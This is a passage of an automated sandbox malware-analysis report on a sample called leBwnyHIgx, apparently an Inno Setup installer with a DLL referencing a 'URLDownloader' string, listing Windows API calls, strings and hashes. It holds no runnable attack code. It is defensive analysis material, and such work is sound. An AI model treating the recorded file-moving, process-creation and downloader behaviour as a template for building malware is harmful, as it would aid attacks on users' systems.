                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2132507429-0
                                                                                    • Opcode ID: cbfe83d1defdd885ccca9dee31e8f3165b3cbbe1b1857a3439133bc7b73916d0
                                                                                    • Instruction ID: eeeb615204661b1aca082b56b3788136df217e3b650a30bde2679d9a32e7b538
                                                                                    • Opcode Fuzzy Hash: cbfe83d1defdd885ccca9dee31e8f3165b3cbbe1b1857a3439133bc7b73916d0
                                                                                    • Instruction Fuzzy Hash: 2701AD70228204AFCB00EF68DE06B9D3BE8FB05314F005A2AF654C71E4E7B49880CB66
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00407FDF
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$0mB$X7@
                                                                                    • API String ID: 3192549508-2219141271
                                                                                    • Opcode ID: f82d1333549365f0fed0bc7ce00f205c8481b44007d847b9f86f21765ec94855
                                                                                    • Instruction ID: fe59e1eddae76fe630356f0a463a62f130d135cc9e4f47475fc7b96310d26dbb
                                                                                    • Opcode Fuzzy Hash: f82d1333549365f0fed0bc7ce00f205c8481b44007d847b9f86f21765ec94855
                                                                                    • Instruction Fuzzy Hash: 2231D6B5A0C207AAD7249E24C544A2777926785300F25963BE401BB7D5C63CFC82AB2F
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(0046E670,00000004,0046E66C,00000000,004703CD,?,0046E66C,00000000), ref: 0047036F
                                                                                      • Part of subcall function 004085D8: CreateThread.KERNEL32(00000000,lF,004085A0,00000000,?,lF), ref: 00408632
                                                                                    • GetCurrentThread.KERNEL32 ref: 004703A7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004703AF
                                                                                    Similarity
                                                                                    • API ID: Thread$Current$CreateErrorLast
                                                                                    • String ID: 9D
                                                                                    • API String ID: 3539746228-2600770735
                                                                                    • Opcode ID: 20054409b78bed9dc7d827a3f23650664e97c0f182fc3617d8a6bc92920a28c5
                                                                                    • Instruction ID: f9857796ad14231e6e04606ef7c0ce10faa70948f457118b7ae5954610b77c36
                                                                                    • Opcode Fuzzy Hash: 20054409b78bed9dc7d827a3f23650664e97c0f182fc3617d8a6bc92920a28c5
                                                                                    • Instruction Fuzzy Hash: 9B31E070A05744EFD720DB76C8417EBBBE4AF09304F40C87EE899D7691DA78A844C769
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000,00650E0C,?,00000000), ref: 00650944
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000,00650E0C), ref: 0065096D
                                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000), ref: 00650986
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$Move
                                                                                    • String ID: isRS-%.3u.tmp
                                                                                    • API String ID: 3839737484-3657609586
                                                                                    • Opcode ID: d74af280762a3c12f4f76a8dd6f825dd2da387fd0f27d3d277c556f93e4830d1
                                                                                    • Instruction ID: fd64645e21a18fecabc0b8dc279039ee35b9e16079179385e1984e8b922befa7
                                                                                    • Opcode Fuzzy Hash: d74af280762a3c12f4f76a8dd6f825dd2da387fd0f27d3d277c556f93e4830d1
                                                                                    • Instruction Fuzzy Hash: 8131C571E002099FEB00EBA9C9829DEB7F9AF44314F50457EF814F32D2CB389E458A55
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00407AEA
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00007A80), ref: 00407B27
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$X7@
                                                                                    • API String ID: 3192549508-2535443016
                                                                                    • Opcode ID: a183f97fa4197104a3b990bab41dee9c34272898e6a4d50137ed02f9a6d104e1
                                                                                    • Instruction ID: b43bc4563ed2c5b4d44d4e312f14e91904ee98f66dbd2fd5bccfcfafe145c76a
                                                                                    • Opcode Fuzzy Hash: a183f97fa4197104a3b990bab41dee9c34272898e6a4d50137ed02f9a6d104e1
                                                                                    • Instruction Fuzzy Hash: B53141B0A08340AFE720EB15C985F27B7F9EB84718F1585AEE504972D1C778FC85C666
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,0064E434,?,0064E424,00000000,0064E408), ref: 0064E3CD
                                                                                    • CloseHandle.KERNEL32(xd,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,0064E434,?,0064E424,00000000), ref: 0064E3EA
                                                                                      • Part of subcall function 0064E2B8: GetLastError.KERNEL32(00000000,0064E353,?,?,?), ref: 0064E2DB
                                                                                    Similarity
                                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                                    • String ID: D$xd
                                                                                    • API String ID: 3798668922-589168589
                                                                                    • Opcode ID: 95fcd11f6f4c2f0d745cd36e2f186585c9965836f891efbcc81fac53fca09950
                                                                                    • Instruction ID: 2770b63dbd5f0664191502d66b5aa67e7b61ccad1497a3da23e2b2c891076db0
                                                                                    • Opcode Fuzzy Hash: 95fcd11f6f4c2f0d745cd36e2f186585c9965836f891efbcc81fac53fca09950
                                                                                    • Instruction Fuzzy Hash: 4111A171644608AFEB00DBD5CC82EDE77EDEF09704F51407AF604E7291E6799D008A69
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000B06,00000000,00000000), ref: 0060066E
                                                                                    • SendMessageW.USER32(?,00000B00,00000000,00000000), ref: 0060070B
                                                                                    Strings
                                                                                    • Failed to create DebugClientWnd, xrefs: 006006D4
                                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0060069A
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                    • API String ID: 3850602802-3720027226
                                                                                    • Opcode ID: 56bf4958779bfb6a8b8f845028800d3ca9d96219ab8fc1fc975935c890bdfb99
                                                                                    • Instruction ID: 4175b821cf142c8e622798afdf7fde6d0c746e5252e1edb01a77202dd48d2af0
                                                                                    • Opcode Fuzzy Hash: 56bf4958779bfb6a8b8f845028800d3ca9d96219ab8fc1fc975935c890bdfb99
                                                                                    • Instruction Fuzzy Hash: 7E1123B06843409FF310EB68DC81B9B7FD99B85708F180429F5849B3D2D7B66C50CBA6
                                                                                    APIs
                                                                                      • Part of subcall function 005AF910: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,0066978C,00000000,005F8F3B,00000000,005F9216,?,?,0066978C), ref: 005AF941
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00619667
                                                                                    • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 00619683
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$FullLoadNamePathRegister
                                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                                    • API String ID: 4170313675-2435364021
                                                                                    • Opcode ID: 6810aaf7b3462b74c952d5d02b70c3a4ed5764cd4a511497df33e8c168d44bba
                                                                                    • Instruction ID: a1c6d1944a89705a1ae2f70c12028eadbe445236a7dfe10c2b454775ce8fdd12
                                                                                    • Opcode Fuzzy Hash: 6810aaf7b3462b74c952d5d02b70c3a4ed5764cd4a511497df33e8c168d44bba
                                                                                    • Instruction Fuzzy Hash: FA014470704209AFEB10FBA5CD92BDE77EDEB48704F504475B500F3292EA78AE458678
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00407FDF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$0mB$X7@
                                                                                    • API String ID: 3192549508-2219141271
                                                                                    • Opcode ID: f19abbc93cf31eb417a733ce6b63261ee329484a2539bf23c4dccce9ea235883
                                                                                    • Instruction ID: ddb2fe431fc2d31df4f4c8d219a5c279b9c969c9caac19d9455eea0c72bea4c9
                                                                                    • Opcode Fuzzy Hash: f19abbc93cf31eb417a733ce6b63261ee329484a2539bf23c4dccce9ea235883
                                                                                    • Instruction Fuzzy Hash: 700180707082019BDB24DF24D9C0B2B73A2AB84700F14852EE845AB385CB38EC45DB6A
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 005F9138
                                                                                      • Part of subcall function 00420F94: DeleteFileW.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FA4
                                                                                      • Part of subcall function 00420F94: GetLastError.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FB3
                                                                                      • Part of subcall function 00420F94: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000), ref: 00420FBB
                                                                                      • Part of subcall function 00420F94: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FD6
                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 005F9165
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                                    • String ID: DeleteFile$MoveFile
                                                                                    • API String ID: 3947864702-139070271
                                                                                    • Opcode ID: d6002e4c8ce380e4da7901459b48cf98f3a1534f7a2910375105cd19add7ce7d
                                                                                    • Instruction ID: b8499831526bb04dbf5f9ac4b51478e099ff73939971a2d4390da8e0a4ff792a
                                                                                    • Opcode Fuzzy Hash: d6002e4c8ce380e4da7901459b48cf98f3a1534f7a2910375105cd19add7ce7d
                                                                                    • Instruction Fuzzy Hash: CAF0497565850A9AEB00FB65D946BBE7BD4FB94304F60443BF504E32C6D93C9C01C629
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(1001C31C,URLDownloader,?,100015D9,1001C6D4), ref: 10015F3B
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015D9,1001C6D4), ref: 10015F6E
                                                                                    • WakeAllConditionVariable.KERNEL32(1001C318,?,100015D9,1001C6D4), ref: 10015F79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                    • String ID: URLDownloader
                                                                                    • API String ID: 1466638765-1891997712
                                                                                    • Opcode ID: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                    • Instruction ID: 2635d989befe49f68561a0190eacd187a5f89713392b86b322bdf01f88d219c5
                                                                                    • Opcode Fuzzy Hash: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                    • Instruction Fuzzy Hash: 88F0C975900628DFE746DF58D8C8E957BA8FB4D394B06C069FA0987322CB34EA50CB95
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00464A70,?,?,0043F138,00000001), ref: 004649AE
                                                                                      • Part of subcall function 00420CF0: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,0043F138,004649F0,00000000,00464A70,?,?,0043F138), ref: 00420D3F
                                                                                      • Part of subcall function 00421144: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,0043F138,00464A0B,00000000,00464A70,?,?,0043F138,00000001), ref: 00421167
                                                                                    • GetLastError.KERNEL32(00000000,00464A70,?,?,0043F138,00000001), ref: 00464A15
                                                                                      • Part of subcall function 004251D8: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,0043F138,00000000,?,00464A24,00000000,00464A70), ref: 004251FC
                                                                                      • Part of subcall function 004251D8: LocalFree.KERNEL32(00000001,00425255,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,0043F138,00000000,?,00464A24,00000000,00464A70), ref: 00425248
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                                    • String ID: 4Dd$d{C
                                                                                    • API String ID: 503893064-2058038346
                                                                                    • Opcode ID: d401f3925e0a0a59aee2edcb24fb99114593ebe0fc7d03629d6b26652d1d1355
                                                                                    • Instruction ID: 0683953512549e244d6d4d668f9f4a6bb5012169835e8b5d33232cac3ad6031b
                                                                                    • Opcode Fuzzy Hash: d401f3925e0a0a59aee2edcb24fb99114593ebe0fc7d03629d6b26652d1d1355
                                                                                    • Instruction Fuzzy Hash: 3F41F670E002099FCB10EFB5C8815EEB7F1AF49314F90817AE904A7382DB785E01CB6A
                                                                                    APIs
                                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040C051
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040C0AF
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040C10C
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040C13F
                                                                                      • Part of subcall function 0040BFFC: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040C0BD), ref: 0040C013
                                                                                      • Part of subcall function 0040BFFC: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040C0BD), ref: 0040C030
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$LanguagesPreferred$Language
                                                                                    • String ID:
                                                                                    • API String ID: 2255706666-0
                                                                                    • Opcode ID: e9b38d102af23e3ac96532df7ba2e3b2cca42ae78a03c66e701db43377d19ec2
                                                                                    • Instruction ID: e50dbe343586da412169edcbcf2f18ed2f71acdc650f4f92d90da3ef9dabf820
                                                                                    • Opcode Fuzzy Hash: e9b38d102af23e3ac96532df7ba2e3b2cca42ae78a03c66e701db43377d19ec2
                                                                                    • Instruction Fuzzy Hash: 11311C70A0021EDBDB10DFE9C885AAEB3B5EF04315F00427AE551E7291DB789A44CB99
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00CD4ECE
                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 00CD4F28
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00CD4F40
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00CD4F8C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 626452242-0
                                                                                    • Opcode ID: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                    • Instruction ID: ca365d46edf6424eaebb9e91f037c3e5a45376a2186ba640e2979927dc7fd4cf
                                                                                    • Opcode Fuzzy Hash: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                    • Instruction Fuzzy Hash: 4431EFB5E40208BFEB14DBD8CD86FAEB7B5EB48710F204254F615AB2D0D671AB009B55
                                                                                    APIs
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10017B76,000000FF,?,10013642,?), ref: 10013A90
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10017B76,000000FF,?,10013642), ref: 10013AAB
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,10013642,?), ref: 10013ADF
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 10013B57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                    • String ID:
                                                                                    • API String ID: 1566052064-0
                                                                                    • Opcode ID: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                    • Instruction ID: 47359edd55c6cc15742bff4ced4580a4001c133a1fe49908c7c5117e5c40c52a
                                                                                    • Opcode Fuzzy Hash: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                    • Instruction Fuzzy Hash: DD3141B4D00259DFDB04DF94D981BEEBBB4FF48310F208659E52667391DB34AA84CBA1
                                                                                    APIs
                                                                                    • __RTC_Initialize.LIBCMT ref: 10016409
                                                                                      • Part of subcall function 10016CAE: InitializeSListHead.KERNEL32(1001C360,10016413,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016CB3
                                                                                    • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182EC,100182F0,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016422
                                                                                    • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182CC,100182E8,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016440
                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10016473
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                    • String ID:
                                                                                    • API String ID: 590286634-0
